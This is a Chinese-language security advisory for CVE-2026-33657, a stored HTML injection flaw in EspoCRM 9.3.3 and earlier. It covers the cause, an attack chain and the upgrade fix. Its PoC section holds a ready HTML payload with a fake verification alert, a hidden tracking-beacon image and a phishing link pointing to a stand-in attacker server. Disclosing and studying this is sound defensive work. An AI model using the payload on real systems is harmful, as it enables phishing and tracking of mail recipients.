IPBUF安全漏洞报告
English
CVE-2026-33657 CVSS 4.6 中危

CVE-2026-33657 EspoCRM存储型HTML注入漏洞

披露日期: 2026-04-13

漏洞信息

漏洞编号
CVE-2026-33657
漏洞类型
存储型HTML注入
CVSS评分
4.6 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
需要交互 (UI:R)
影响产品
EspoCRM

相关标签

EspoCRM存储型HTML注入XSS邮件伪造钓鱼攻击CVE-2026-33657

漏洞概述

EspoCRM 9.3.3及以下版本存在存储型HTML注入漏洞。经过身份验证的普通用户可利用流活动笔记的post字段注入恶意HTML代码。由于服务器端Handlebars模板未转义渲染,且Markdown处理器保留内联HTML,这些代码会被保存并直接渲染到系统发送的邮件通知中。攻击者可利用此漏洞进行钓鱼攻击、用户跟踪或邮件内容篡改。

技术细节

该漏洞的核心在于EspoCRM处理流活动笔记时的渲染逻辑缺陷。首先,服务器端Handlebars模板使用未转义的三重花括号语法(`{{{ }}}`)来渲染用户输入的post字段,这意味着HTML标签不会被转义为实体字符。其次,后台的Markdown处理器配置为默认保留内联HTML标签,并未对其进行过滤。更为关键的是,系统的渲染管道明确跳过了对`additionalData`对象中包含字段的清理步骤。这三者结合,构建了一条完整的攻击链路:攻击者输入的恶意HTML被原样存储。当攻击者利用@mention功能触发邮件通知时,系统会调用配置的SMTP身份(通常是高权限的管理员发件人地址)生成邮件。由于未经过滤的HTML被直接嵌入邮件正文,攻击者不仅能实施钓鱼攻击,还能通过嵌入图片信标等方式追踪用户行为,极大地提高了攻击的成功率和隐蔽性。

攻击链分析

STEP 1
步骤1
攻击者使用拥有普通权限的账户登录EspoCRM系统。
STEP 2
步骤2
攻击者在“流活动笔记”功能中创建新笔记,并在post字段输入包含HTML标签的恶意代码。
STEP 3
步骤3
攻击者在笔记内容中使用@mention功能提及目标受害者,触发系统的邮件通知机制。
STEP 4
步骤4
后端Handlebars模板使用三重花括号语法渲染post字段,且跳过sanitization,将恶意HTML直接存入数据库。
STEP 5
步骤5
系统通过配置的SMTP服务器(通常显示为管理员地址)向受害者发送通知邮件。
STEP 6
步骤6
受害者收到邮件,邮件客户端解析并渲染攻击者注入的HTML内容,导致钓鱼链接展示或隐私数据泄露。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
<!-- PoC for CVE-2026-33657 Stored HTML Injection --> <!-- 1. Attacker creates a new Stream Note in EspoCRM --> <!-- 2. Inserts the following payload in the 'post' field --> <div style="background-color:#f0f0f0;padding:10px;border:1px solid #ccc;"> <h3>System Security Alert</h3> <p>Your account requires immediate verification.</p> <!-- Image beacon for tracking --> <img src="http://attacker-controlled-server.com/track.php?user={victim_id}" width="1" height="1" style="display:none;"> <!-- Malicious link for phishing --> <a href="http://attacker-controlled-server.com/login.php">Click here to verify your account</a> </div> <!-- 3. Attacker uses @mention to target a specific user (e.g., @admin) --> <!-- 4. The system sends an email notification rendering the HTML above -->

影响范围

EspoCRM <= 9.3.3

防御指南

临时缓解措施
建议立即将EspoCRM升级至9.3.4版本以彻底修复此漏洞。如果无法立即升级,应严格限制用户对流活动笔记的写入权限,并禁用或监控@提及功能。同时,应教育用户不要轻信系统发送的邮件中包含的任何可疑链接或交互元素,即使发件人显示为系统管理员。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表